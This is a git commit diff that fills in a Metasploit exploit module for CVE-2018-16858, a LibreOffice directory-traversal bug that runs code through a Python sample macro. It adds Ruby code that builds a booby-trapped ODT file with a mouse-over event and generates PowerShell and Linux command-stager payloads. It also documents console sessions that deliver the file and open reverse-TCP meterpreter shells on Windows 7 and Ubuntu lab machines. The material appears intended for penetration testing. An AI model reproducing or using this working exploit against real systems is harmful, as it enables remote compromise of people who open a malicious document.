added documentation and changes for module
parent
da0c0d7d3f
commit
8dc8a18d2b
|
@ -1,8 +1,8 @@
|
|||
## Description
|
||||
|
||||
This module exploits a directory traversal vulnerability in LibreOffice `v6.1.0-6.1.4.1` that enables remote code execution.
|
||||
Note: `6.0.x` versions are vulnerable to the directory traversal attack, but are not exploitable by this module due to the
|
||||
lack of ability to pass arguments.
|
||||
This module exploits a directory traversal vulnerability in LibreOffice `v6.1.0-6.1.2.1` that enables remote code execution.
|
||||
Note: `6.0.x` and `6.1.3.x` versions are reportedly vulnerable to the directory traversal attack, but are not exploitable by
|
||||
this module due to the lack of ability to pass arguments.
|
||||
|
||||
LibreOffice comes bundled with sample macros written in Python and allows the ability to bind program events
|
||||
to them. A macro can be tied to a program event by including the script that contains the macro and the function
|
||||
|
@ -32,10 +32,66 @@
|
|||
|
||||
## Scenarios
|
||||
|
||||
### Version of software and OS as applicable
|
||||
### Tested on LibreOffice 6.1.2.1 running Windows 7
|
||||
|
||||
```
|
||||
msf > use module_name
|
||||
msf auxiliary(module_name) > set POWERLEVEL >9000
|
||||
msf auxiliary(module_name) > exploit
|
||||
msf5 > use exploit/multi/fileformat/libreoffice_macro_exec
|
||||
msf5 exploit(multi/fileformat/libreoffice_macro_exec) > set lhost 192.168.37.1
|
||||
lhost => 192.168.37.1
|
||||
msf5 exploit(multi/fileformat/libreoffice_macro_exec) > run
|
||||
|
||||
[+] librefile.odt stored at /Users/space/.msf4/local/librefile.odt
|
||||
msf5 exploit(multi/fileformat/libreoffice_macro_exec) > use multi/handler
|
||||
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
|
||||
payload => windows/meterpreter/reverse_tcp
|
||||
msf5 exploit(multi/handler) > set lhost 192.168.37.1
|
||||
lhost => 192.168.37.1
|
||||
msf5 exploit(multi/handler) > run
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.37.1:4444
|
||||
[*] Sending stage (179779 bytes) to 192.168.37.156
|
||||
[*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.156:49180) at 2019-04-12 15:14:04 -0500
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: WIN-MGMN7ND70I1\a_user
|
||||
meterpreter > sysinfo
|
||||
Computer : WIN-MGMN7ND70I1
|
||||
OS : Windows 7 (Build 7601, Service Pack 1).
|
||||
Architecture : x64
|
||||
System Language : en_US
|
||||
Domain : WORKGROUP
|
||||
Logged On Users : 1
|
||||
Meterpreter : x86/windows
|
||||
```
|
||||
|
||||
### Tested on LibreOffice 6.1.0.1 running Ubuntu 18.04
|
||||
|
||||
```
|
||||
msf5 > use exploit/multi/fileformat/libreoffice_macro_exec
|
||||
msf5 exploit(multi/fileformat/libreoffice_macro_exec) > set target 1
|
||||
target => 1
|
||||
msf5 exploit(multi/fileformat/libreoffice_macro_exec) > set lhost 192.168.37.1
|
||||
lhost => 192.168.37.1
|
||||
msf5 exploit(multi/fileformat/libreoffice_macro_exec) > run
|
||||
|
||||
[+] librefile.odt stored at /Users/space/.msf4/local/librefile.odt
|
||||
msf5 exploit(multi/fileformat/libreoffice_macro_exec) > use multi/handler
|
||||
msf5 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
|
||||
payload => linux/x86/meterpreter/reverse_tcp
|
||||
msf5 exploit(multi/handler) > set LHOST 192.168.37.1
|
||||
LHOST => 192.168.37.1
|
||||
msf5 exploit(multi/handler) > run
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.37.1:4444
|
||||
[*] Sending stage (985320 bytes) to 192.168.37.174
|
||||
[*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.174:39912) at 2019-04-12 14:50:08 -0500
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: uid=1000, gid=1000, euid=1000, egid=1000
|
||||
meterpreter > sysinfo
|
||||
Computer : 192.168.37.174
|
||||
OS : Ubuntu 18.04 (Linux 4.18.0-16-generic)
|
||||
Architecture : x64
|
||||
BuildTuple : i486-linux-musl
|
||||
Meterpreter : x86/linux
|
||||
```
|
||||
|
|
|
@ -12,8 +12,20 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Placeholder',
|
||||
'Name' => 'LibreOffice Macro Code Execution',
|
||||
'Description' => %q{
|
||||
LibreOffice comes bundled with sample macros written in Python and
|
||||
allows the ability to bind program events to them. A macro can be tied
|
||||
to a program event by including the script that contains the macro and
|
||||
the function name to be executed. Additionally, a directory traversal
|
||||
vulnerability exists in the component that references the Python script
|
||||
to be executed. This allows a program event to execute functions from Python
|
||||
scripts relative to the path of the samples macros folder. The pydoc.py script
|
||||
included with LibreOffice contains the tempfilepager function that passes
|
||||
arguments to os.system, allowing RCE.
|
||||
|
||||
This module generates an ODT file with a mouse over event that
|
||||
when triggered, will execute arbitrary code.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
|
@ -26,6 +38,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
[ 'CVE', '2018-16858' ],
|
||||
[ 'URL', 'https://insert-script.blogspot.com/2019/02/libreoffice-cve-2018-16858-remote-code.html' ]
|
||||
],
|
||||
'Platform' => [ 'win', 'linux' ],
|
||||
'Arch' => [ ARCH_X86, ARCH_X64 ],
|
||||
'Targets' =>
|
||||
[
|
||||
[
|
||||
|
@ -42,18 +56,17 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'Platform' => 'linux',
|
||||
'Arch' => ARCH_X86,
|
||||
'Payload' => 'linux/x86/meterpreter/reverse_tcp',
|
||||
'CmdStagerFlavor' => [ 'printf' ]
|
||||
'CmdStagerFlavor' => 'printf'
|
||||
}
|
||||
]
|
||||
],
|
||||
'DisclosureDate' => "Oct 18, 2018",
|
||||
'DefaultTarget' => 0
|
||||
)
|
||||
)
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('FILENAME', [true, 'Output file name', 'librefile.fodt'])
|
||||
OptString.new('FILENAME', [true, 'Output file name', 'librefile.odt'])
|
||||
])
|
||||
end
|
||||
|
||||
|
@ -62,7 +75,6 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
{
|
||||
:remove_comspec => true,
|
||||
:method => 'reflection',
|
||||
:wrap_double_quotes => false,
|
||||
:encode_final_payload => true
|
||||
}
|
||||
@cmd = cmd_psh_payload(payload.encoded, payload_instance.arch.first, opts)
|
||||
|
@ -70,13 +82,14 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def gen_linux_cmd
|
||||
@cmd = generate_cmdstager
|
||||
@cmd = generate_cmdstager.first
|
||||
@cmd << ' && echo'
|
||||
end
|
||||
|
||||
def gen_file(path)
|
||||
text_content = Rex::Text.rand_text_alpha(10..15)
|
||||
|
||||
# file from Alex Inführ's PoC post referenced above
|
||||
fodt_file = File.read(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-16858', 'librefile.erb'))
|
||||
libre_file = ERB.new(fodt_file).result(binding())
|
||||
libre_file
|
||||
|
|
Loading…
Reference in New Issue